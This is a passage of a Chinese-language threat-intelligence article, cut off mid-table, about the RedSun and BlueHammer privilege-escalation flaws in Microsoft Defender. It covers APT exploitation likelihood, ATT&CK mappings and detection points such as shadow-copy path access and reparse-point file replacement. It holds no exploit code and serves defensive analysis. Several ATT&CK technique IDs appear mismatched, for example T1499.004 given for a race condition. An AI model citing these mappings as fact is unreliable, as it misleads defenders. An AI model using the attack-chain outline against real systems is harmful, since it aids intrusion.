100%;"><p><span leaf="">独立安全研究员</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">公开RedSun漏洞及完整PoC</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Chaotic Eclipse的研究者身份值得特别关注。根据开源情报分析，该研究者长期关注微软安全产品的漏洞挖掘，其公开RedSun漏洞的动机被普遍解读为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">对BlueHammer补丁处理方式的不满</span></strong><span leaf="">——BlueHammer漏洞细节在微软修复前被公开披露，这可能导致了厂商与研究者之间的信任破裂。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">APT组织利用可能性评估</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从威胁行为体归因视角分析，CVE-2026-33825类漏洞对高级持续性威胁（APT）组织具有显著战略价值：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">利用价值评估</span></strong><span leaf="">：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">微软Defender作为Windows内置安全组件，部署量覆盖全球数亿终端</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">漏洞利用门槛低（本地访问即可，无需用户交互）</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">获取SYSTEM权限后可建立持久化据点，完全接管目标主机</span></span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;">可与供应链攻击、初始访问向量形成高效攻击链</span></span></p></li></ul></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">APT组织潜在利用路径</span></strong><span leaf="">：在APT攻击杀伤链模型中，该漏洞位于</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">权限提升</span></strong><span leaf="">和</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">持久化</span></strong><span leaf="">环节。攻击者通常通过鱼叉式钓鱼（Spear Phishing）或供应链攻陷（Supply Chain Compromise）获取初始低权限访问，随后利用此类漏洞提升至SYSTEM权限，为后续的横向移动和数据外泄奠定基础。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">关联威胁活动预警</span></strong><span leaf="">：考虑到BlueHammer利用代码已公开、RedSun PoC已发布，</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高能力威胁行为体</span></strong><span leaf="">（包括APT组织）在未来30天内将该漏洞集成至攻击工具库的概率为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高</span></strong><span leaf="">。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">战术技术演变分析（MITRE ATT&amp;CK框架映射）</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">本章节将BlueHammer和RedSun漏洞的攻击战术映射至MITRE ATT&amp;CK v14框架，为安全团队的检测与响应提供技术参照。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">BlueHammer攻击链ATT&amp;CK映射</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">攻击阶段</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">ATT&amp;CK战术</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术ID</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术描述</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始访问</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过漏洞组合实现</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1078.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用合法凭证或低权限账户</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用漏洞提权</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">T1068</span></strong></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用软件漏洞获取更高权限</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">滥用权限控制机制</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">T1548</span></strong></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">绕过访问控制限制</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">创建账户</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1136.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">创建本地管理员账户</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">RedSun攻击链ATT&amp;CK映射</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">攻击阶段</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">ATT&amp;CK战术</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术ID</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术描述</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用云标签处理缺陷</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1068</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用文件系统交互逻辑缺陷</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用竞争条件</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1499.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">滥用系统功能的时序特性</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">写入特权位置</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1544</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">替换受保护的系统文件</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">关键检测点</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">针对RedSun攻击链，防御者应重点监控以下异常行为组合：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">Cloud Files API异常调用</span><span textstyle="" style="font-size: 16px;">：非同步提供者角色却调用Cloud Files API</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">卷影复制设备枚举</span><span textstyle="" style="font-size: 16px;">：用户态代码对\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy 等路径的访问</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">临时目录重解析点创建</span><span textstyle="" style="font-size: 16px;">：在用户临时目录创建重解析点后尝试替换系统文件</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">文件恢复行为异常：</span><span textstyle="" style="font-size: 16px;font-weight: normal;">Defender执行非预期的文件恢复操作</span></span></strong></p></li></ul></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内影响评估</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">暴露面分析</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">微软Defender作为Windows 10/11操作系统的内置安全组件，其默认启用特性使其成为国内数量最庞大的终端安全基础设施之一。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">高风险场景识别</span></strong><span leaf="">：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr 